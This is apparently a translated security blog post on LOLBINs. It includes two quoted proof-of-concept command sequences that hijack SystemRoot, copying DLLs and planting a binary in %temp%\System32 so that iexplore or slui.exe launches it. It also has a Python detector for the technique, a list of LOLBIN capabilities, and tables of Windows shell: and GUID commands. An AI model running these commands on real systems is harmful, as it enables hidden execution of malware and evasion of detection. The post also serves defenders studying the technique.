Video walkthrough

In this video we share a few neat LOLBIN tricks. First, a short introduction to the concept of LOLBINs (Living off the Land Binaries): a common way for attackers to hide their tracks by abusing files that ship with the operating system, or other files carrying the system's own signature, to slip past detection. Here we use the start iexplore command that Windows itself provides to launch Internet Explorer and force the user to open a piece of malware; the calculator stands in for the malware as the proof of concept. Let's take a look!

How the LOLBIN trick works

Shared by @notwhickey on Twitter

Have you ever considered that Internet Explorer is a LOLBIN?
By navigating to the URI shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107} you can spawn rstrui.exe (System Restore).
If you modify the SystemRoot environment variable and copy the DLLs, you can run anything you like.

Proof of concept

mkdir %temp%\System32
FOR /R C:\Windows\System32\ %F IN (*.dll) DO COPY "%F" %temp%\System32\ /Y >NUL
set a=C:\Windows\System32\calc.exe
copy %a% %temp%\System32\rstrui.exe /Y > NUL
set SystemRoot=%temp%
start iexplore shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}

I found a signed #lolbin for proxy execution.
Use set to change the SystemRoot environment variable to a controlled directory.
Plant a binary at the path <controlled directory>\System32\ChangePk.exe.
Copy the required DLLs.
Run slui.exe.

I wonder whether it works on your CPU.

Proof of concept

set a=C:\Windows\System32\calc.exe
set SystemRoot=%temp%
mkdir %temp%\System32
copy C:\Windows\System32\slui.exe %temp%\System32\ /Y >NUL
copy %a% %temp%\System32\ChangePk.exe /Y > NUL
FOR /R C:\Windows\System32\ %F IN (*.dll) DO COPY "%F" %temp%\System32\ /Y >NUL
slui.exe
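Both proofs of concept above leave the same two traces in process-creation telemetry: a System32-resident binary (rstrui.exe, slui.exe or ChangePk.exe) starting from a directory other than the real System32, and iexplore.exe being handed the System Restore shell namespace object. The check below, an added defensive example that is not from the original post or the quoted tweets, runs over constructed events modelled on Sysmon Event ID 1 fields (Image, ParentImage, CommandLine); it assumes the genuine SystemRoot is C:\Windows.

```python
from pathlib import PureWindowsPath

# Where the genuine System32 lives; assumed to be C:\Windows on the monitored hosts.
TRUSTED_SYSTEM32 = PureWindowsPath(r"C:\Windows\System32")
# Binaries the post shows being resolved through a rewritten SystemRoot.
SYSTEM_RESIDENT = {"rstrui.exe", "slui.exe", "changepk.exe"}
# Shell namespace object (System Restore) that makes iexplore spawn rstrui.exe.
SYSTEM_RESTORE_CLSID = "{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}"

# Constructed sample events (invented for this demo, not real telemetry),
# loosely shaped like Sysmon Event ID 1: Image, ParentImage, CommandLine.
EVENTS = [
    {"Image": r"C:\Windows\System32\rstrui.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": r"C:\Windows\System32\rstrui.exe"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\System32\rstrui.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\System32\rstrui.exe"},
    {"Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "iexplore shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\System32\ChangePk.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\System32\slui.exe",
     "CommandLine": "ChangePk.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

def _misplaced(path_str):
    """True if a System32-resident binary runs from any directory but the real System32."""
    path = PureWindowsPath(path_str)  # Windows paths compare case-insensitively
    return path.name.lower() in SYSTEM_RESIDENT and path.parent != TRUSTED_SYSTEM32

def analyze(event):
    """Return the reasons one event looks like the SystemRoot hijack (empty if clean)."""
    findings = []
    if _misplaced(event["Image"]):
        findings.append(f"{event['Image']} runs outside {TRUSTED_SYSTEM32}")
    if _misplaced(event["ParentImage"]):
        findings.append(f"parent {event['ParentImage']} runs outside {TRUSTED_SYSTEM32}")
    if (PureWindowsPath(event["Image"]).name.lower() == "iexplore.exe"
            and SYSTEM_RESTORE_CLSID in event["CommandLine"].lower()):
        findings.append("iexplore.exe opened the System Restore shell namespace object")
    return findings

def scan(events):
    """Return [(Image, findings)] for every event that produced at least one finding."""
    hits = [(e["Image"], analyze(e)) for e in events]
    return [(image, findings) for image, findings in hits if findings]
```

A relocated slui.exe is caught twice in the sample data: once as the misplaced child ChangePk.exe and once as the misplaced parent, which is why the parent path is checked as well.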

Introduction to LOLBINs

The following is excerpted from "浅谈Living Off the Land Binaries" (A brief discussion of Living Off the Land Binaries).

What are LoLbins?

Living off the land Binaries is abbreviated LoLbins. The term Living off the land was coined by Christopher Campbell and Matt Graeber. LoLbins are binary files that an attacker can use to perform work beyond the binary's own intended function.

LoLbin capabilities

  • Code execution
    • Arbitrary code execution.
    • Executing other programs (without a Microsoft signature) or scripts through LOLbins.
  • Code compilation
  • File operations
    • Downloading;
    • Uploading;
    • Copying.
  • Persistence
    • Using existing LOLBins to maintain access.
    • Persistence (for example, hiding data in AD and launching it at logon).
  • UAC bypass
  • Dumping process memory
  • Surveillance (for example keyloggers, network tracing, and so on).
  • Evading or modifying logs
  • DLL injection/side-loading that does not require relocating to another location on the file system.

Are threat groups using LOLBINs?

shell commands – full list

The following is a compilation of the common shell commands on Windows 11 and the application each one opens.

Shell command | Application opened
shell:3D Objects | 3D Objects
shell:AccountPictures | Account Pictures
shell:AddNewProgramsFolder | AddNewProgramsFolder
shell:Administrative Tools | Windows Tools
shell:AppData | AppData
shell:AppDataDesktop | AppDataDesktop
shell:AppDataDocuments | AppDataDocuments
shell:AppDataFavorites | AppDataFavorites
shell:AppDataProgramData | AppDataProgramData
shell:Application Shortcuts | Application Shortcuts
shell:AppMods | Application Mods
shell:AppsFolder | AppsFolder
shell:AppUpdatesFolder | AppUpdatesFolder
shell:Cache | Cache
shell:Camera Roll | Camera Roll
shell:CameraRollLibrary | Camera Roll
shell:Captures | Captures
shell:CD Burning | Temporary Burn Folder
shell:ChangeRemoveProgramsFolder | ChangeRemoveProgramsFolder
shell:Common Administrative Tools | Windows Tools
shell:Common AppData | Common AppData
shell:Common Desktop | Public Desktop
shell:Common Documents | Public Documents
shell:Common Programs | Programs
shell:Common Start Menu | Start Menu
shell:Common Start Menu Places | Start Menu
shell:Common Startup | Startup
shell:Common Templates | Common Templates
shell:CommonDownloads | Public Downloads
shell:CommonMusic | Public Music
shell:CommonPictures | Public Pictures
shell:CommonRingtones | CommonRingtones
shell:CommonVideo | Public Videos
shell:ConflictFolder | ConflictFolder
shell:ConnectionsFolder | ConnectionsFolder
shell:Contacts | Contacts
shell:ControlPanelFolder | ControlPanelFolder
shell:Cookies | Cookies
shell:CredentialManager | CredentialManager
shell:CryptoKeys | CryptoKeys
shell:CSCFolder | CSCFolder
shell:Desktop | Desktop
shell:Development Files | Development Files
shell:Device Metadata Store | Device Metadata Store
shell:DocumentsLibrary | Documents
shell:Downloads | Downloads
shell:DpapiKeys | DpapiKeys
shell:Favorites | Favorites
shell:Fonts | Fonts
shell:GameTasks | GameTasks
shell:History | History
shell:ImplicitAppShortcuts | ImplicitAppShortcuts
shell:InternetFolder | InternetFolder
shell:Libraries | Libraries
shell:Links | Links
shell:Local AppData | Local AppData
shell:Local Documents | Documents
shell:Local Downloads | Downloads
shell:Local Music | Music
shell:Local Pictures | Pictures
shell:Local Videos | Videos
shell:LocalAppDataLow | LocalAppDataLow
shell:LocalizedResourcesDir | LocalizedResourcesDir
shell:MAPIFolder | MAPIFolder
shell:MusicLibrary | Music
shell:My Music | Music
shell:My Pictures | Pictures
shell:My Video | Videos
shell:MyComputerFolder | MyComputerFolder
shell:NetHood | NetHood
shell:NetworkPlacesFolder | NetworkPlacesFolder
shell:OEM Links | OEM Links
shell:OneDrive | OneDrive
shell:OneDriveCameraRoll | OneDriveCameraRoll
shell:OneDriveDocuments | OneDriveDocuments
shell:OneDriveMusic | OneDriveMusic
shell:OneDrivePictures | OneDrivePictures
shell:Original Images | Original Images
shell:Personal | Documents
shell:PhotoAlbums | Slide Shows
shell:PicturesLibrary | Pictures
shell:Playlists | Playlists
shell:PrintersFolder | PrintersFolder
shell:PrintHood | PrintHood
shell:Profile | Profile
shell:ProgramFiles | Program Files
shell:ProgramFilesCommon | ProgramFilesCommon
shell:ProgramFilesCommonX64 | ProgramFilesCommonX64
shell:ProgramFilesCommonX86 | ProgramFilesCommonX86
shell:ProgramFilesX64 | ProgramFilesX64
shell:ProgramFilesX86 | Program Files (x86)
shell:Programs | Programs
shell:Public | Public
shell:PublicAccountPictures | Public Account Pictures
shell:PublicGameTasks | PublicGameTasks
shell:PublicLibraries | PublicLibraries
shell:Quick Launch | Quick Launch
shell:Recent | Recent Items
shell:Recorded Calls | Recorded Calls
shell:RecordedTVLibrary | Recorded TV
shell:RecycleBinFolder | RecycleBinFolder
shell:ResourceDir | ResourceDir
shell:Retail Demo | Retail Demo
shell:Ringtones | Ringtones
shell:Roamed Tile Images | Roamed Tile Images
shell:Roaming Tiles | Roaming Tiles
shell:SavedGames | Saved Games
shell:SavedPictures | Saved Pictures
shell:SavedPicturesLibrary | Saved Pictures
shell:Screenshots | Screenshots
shell:Searches | Searches
shell:SearchHistoryFolder | SearchHistoryFolder
shell:SearchHomeFolder | SearchHomeFolder
shell:SearchTemplatesFolder | SearchTemplatesFolder
shell:SendTo | SendTo
shell:Start Menu | Start Menu
shell:Startup | Startup
shell:SyncCenterFolder | SyncCenterFolder
shell:SyncResultsFolder | SyncResultsFolder
shell:SyncSetupFolder | SyncSetupFolder
shell:System | System
shell:SystemCertificates | SystemCertificates
shell:SystemX86 | SystemX86
shell:Templates | Templates
shell:ThisDeviceFolder | ThisDeviceFolder
shell:ThisPCDesktopFolder | Desktop
shell:User Pinned | User Pinned
shell:UserProfiles | Users
shell:UserProgramFiles | UserProgramFiles
shell:UserProgramFilesCommon | UserProgramFilesCommon
shell:UsersFilesFolder | UsersFilesFolder
shell:UsersLibrariesFolder | UsersLibrariesFolder
shell:VideosLibrary | Videos
shell:Windows | Windows

The list above is not the main point; the main point is here. There are also some rather odd ways of opening things through a GUID:

Shell command containing a GUID | Application opened
shell:::{088e3905-0323-4b02-9826-5d99428e115f} | Downloads
shell:::{0DB7E03F-FC29-4DC6-9020-FF41B59E513A} | 3D Objects
shell:::{1CF1260C-4DD0-4ebb-811F-33C572699FDE} | Music
shell:::{24ad3ad4-a569-4530-98e1-ab02f9417aa8} | Pictures
shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0} | Windows Search
shell:::{3134ef9c-6b18-4996-ad04-ed5912e00eb5} | Recent Files
shell:::{374DE290-123F-4565-9164-39C4925E467B} | Downloads
shell:::{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B} | Connect To
shell:::{3ADD1653-EB32-4cb0-BBD7-DFA0ABB5ACCA} | Pictures
shell:::{3dfdf296-dbec-4fb4-81d1-6a3438bcf4de} | Music
shell:::{450D8FBA-AD25-11D0-98A8-0800361B1103} | My Documents
shell:::{679f85cb-0220-4080-b29b-5540cc05aab6} | Quick Access
shell:::{A0953C92-50DC-43bf-BE83-3742FED03C9C} | Videos
shell:::{A8CDFF1C-4878-43be-B5FD-F8091C1C60D0} | Documents
shell:::{B4BFCC3A-DB2C-424C-B029-7FE99A87C641} | Desktop
shell:::{d3162b92-9365-467a-956b-92703aca08af} | Documents
shell:::{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a} | Videos
shell:::{D4480A50-BA28-11d1-8E75-00C04FA31A86} | Add Network Place
shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D} | All Control Panel Items
shell:::{ED7BA470-8E54-465E-825C-99712043E01C} | All Tasks
shell:::{4234d49b-0245-4df3-b780-3893943456e1} | Applications
shell:::{c57a6066-66a3-4d91-9eb9-41532179f0a5} | AppSuggestedLocations
shell:::{9C60DE1E-E5FC-40f4-A487-460851A8D915} | AutoPlay
shell:::{28803F59-3A75-4058-995F-4EE5503B023C} | Bluetooth Devices
shell:::{9343812e-1c37-4a49-a12e-4b2d810d956b} | Classic Windows Search
shell:::{437ff9c0-a07f-4fa0-af80-84b6c6440a16} | Command Folder
shell:::{d34a6ca6-62c2-4c34-8a7c-14709c1ad938} | Common Places FS Folder
shell:::{F02C1A0D-BE21-4350-88B0-7367FC96EF3C} | Network Computers and Devices
shell:::{26EE0668-A00A-44D7-9371-BEB064C98683} | Control Panel
shell:::{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0} | Control Panel command object for Start menu and desktop
shell:::{1206F5F1-0569-412C-8FEC-3204630DFB70} | Credential Manager
shell:::{b155bdf8-02f0-451e-9a26-ae317cfd7779} | delegate folder that appears in Computer
shell:::{A8A91A66-3A7D-4424-8D24-04E180695C7A} | Devices and Printers
shell:::{289AF617-1CC3-42A6-926C-E6A863F0E3BA} | Media Servers
shell:::{D555645E-D4F8-4c29-A827-D93C859C4F2A} | Ease of Access Center
shell:::{ECDB0924-4208-451E-8EE0-373C0956DE16} | Work Folders
shell:::{323CA680-C24D-4099-B94D-446DD2D7249E} | Favorites
shell:::{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} | File Explorer Options
shell:::{93412589-74D4-4E4E-AD0E-E0CB621440FD} | Font settings
shell:::{3936E9E4-D92C-4EEE-A85A-BC16D5EA0819} | Frequent folders
shell:::{1D2680C9-0E2A-469d-B787-065558BC7D43} | Fusion Cache
shell:::{F6B6E965-E9B2-444B-9286-10C9152EDBC5} | File History
shell:::{67CA7650-96E6-4FDD-BB43-A8E774F73A57} | HomeGroup
shell:::{0907616E-F5E6-48D8-9D61-A91C3D28106D} | Remote File Browser
shell:::{15eae92e-f17a-4431-9f28-805e482dafd4} | Get Programs
shell:::{d450a8a1-9568-45c7-9c0e-b4f9fb4537bd} | Installed Updates
shell:::{B2B4A4D1-2754-4140-A2EB-9A76D9D7CDC6} | Linux
shell:::{1FA9085F-25A2-489B-85D4-86326EEDCD87} | Manage Wireless Networks
shell:::{63da6ec0-2e98-11cf-8d82-444553540000} | Microsoft FTP Folder
shell:::{89D83576-6BD1-4c86-9454-BEB04E94C819} | Microsoft Office Outlook
shell:::{5ea4f148-308c-46d7-98a9-49041b1dd468} | Windows Mobility Center
shell:::{208D2C60-3AEA-1069-A2D7-08002B30309D} | Network
shell:::{8E908FC9-BECC-40f6-915B-F4CA0E70D03D} | Network and Sharing Center
shell:::{7007ACC7-3202-11D1-AAD2-00805FC1270E} | Network Connections
shell:::{992CFFA0-F557-101A-88EC-00DD010CCC48} | Network Connections
shell:::{BD7A2E7B-21CB-41b2-A086-B309680C6B7E} | Offline Files
shell:::{AFDB1F70-2A4C-11d2-9039-00C04F8EEB3E} | Offline Files Folder
shell:::{018D5C66-4533-4307-9B53-224DE2ED1FE6} | OneDrive
shell:::{6785BFAC-9D2D-4be5-B7E2-59937E8FB80A} | Homegroup
shell:::{ED834ED6-4B5A-4bfe-8F11-A626DCB6A921} | Personalization
shell:::{35786D3C-B075-49b9-88DD-029876E11C01} | Portable Devices
shell:::{025A5937-A6BE-4686-A844-36FE4BEC8B6D} | Power Options
shell:::{9DB7A13C-F208-4981-8353-73CC61AE2783} | Previous Versions
shell:::{a3c3d402-e56c-4033-95f7-4885e80b0111} | Previous Versions Results Delegate Folder
shell:::{f8c2ab3b-17bc-41da-9758-339d7dbf2d88} | Previous Versions Results Folder
shell:::{2227A280-3AEA-1069-A2DE-08002B30309D} | Printers
shell:::{ed50fc29-b964-48a9-afb3-15ebb9b97f36} | printhood delegate folder
shell:::{7b81be6a-ce2b-4676-a29e-eb907a5126c5} | Programs and Features
shell:::{4336a54d-038b-4685-ab02-99bb52d3fb8b} | Public Folder
shell:::{4564b25e-30cd-4787-82ba-39e73a750b14} | Recent Items Instance Folder
shell:::{22877a6d-37a1-461a-91b0-dbda5aaebc99} | Recent Places Folder
shell:::{645FF040-5081-101B-9F08-00AA002F954E} | Recycle Bin
shell:::{863aa9fd-42df-457b-8e4d-0de1b8015c60} | Remote Printers
shell:::{F5FB2C77-0E2F-4A16-A381-3E560C68BC83} | Removable Drives
shell:::{a6482830-08eb-41e2-84c1-73920c2badb9} | Removable Storage Devices
shell:::{2965e715-eb66-4719-b53f-1672673bbefa} | Results Folder
shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0} | Run…
shell:::{D9EF8727-CAC2-4e60-809E-86F80A666C91} | BitLocker Drive Encryption
shell:::{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} | Security and Maintenance
shell:::{2559a1f7-21d7-11d4-bdaf-00c04f60b9f0} | Set Program Access and Computer Defaults
shell:::{17cd9488-1228-4b2f-88ce-4298e93e0966} | Default Programs
shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257} | Show desktop
shell:::{58E3C745-D971-4081-9034-86E34B30836A} | Speech Recognition
shell:::{48e7caab-b918-4e58-a94d-505519c795dc} | Start Menu
shell:::{F942C606-0914-47AB-BE56-1321B8035096} | Storage Spaces
shell:::{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF} | Sync Center
shell:::{2E9E59C0-B437-4981-A647-9C34B9B90891} | Sync Setup Folder
shell:::{BB06C0E4-D293-4f75-8A90-CB05B6477EEE} | About System
shell:::{9FE63AFD-59CF-4419-9775-ABCC3849F861} | System Recovery
shell:::{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107} | System Restore
shell:::{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9} | Taskbar
shell:::{0DF44EAA-FF21-4412-828E-260A8728E7F1} | Taskbar
shell:::{5b934b42-522b-4c34-bbfe-37a3ef7b9c90} | This Device
shell:::{f8278c54-a712-415b-b593-b77a2be0dda9} | This Device
shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D} | This PC
shell:::{C58C4893-3BE0-4B45-ABB5-A63E4B8C8651} | Troubleshooting
shell:::{60632754-c523-4b62-b45c-4172da012619} | User Accounts
shell:::{7A9D77BD-5403-11d2-8785-2E0420524153} | User Accounts
shell:::{1f3427c8-5c10-4210-aa03-2ee45287d668} | User Pinned
shell:::{59031a47-3f72-44a7-89c5-5595fe6b30ee} | UsersFiles
shell:::{031E4825-7B94-4dc3-B131-E946B44C8DD5} | Libraries
shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257} | Switch between windows
shell:::{B98A2BEA-7D42-4558-8BD1-832F41BAC6FD} | Backup and Restore (Windows 7)
shell:::{4026492F-2F69-46B8-B9BF-5654FC07E423} | Windows Defender Firewall
shell:::{67718415-c450-4f3c-bf8a-b487642dc39b} | Windows Features
shell:::{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0} | Windows Security
shell:::{D20EA4E1-3957-11d2-A40B-0C5020524153} | Windows Tools
shell:::{241D7C96-F8BF-4F85-B01F-E2B043341A4B} | RemoteApp and Desktop Connections
shell:::{F874310E-B6B7-47DC-BC84-B9E6B38F5903} | The Home folder in File Explorer
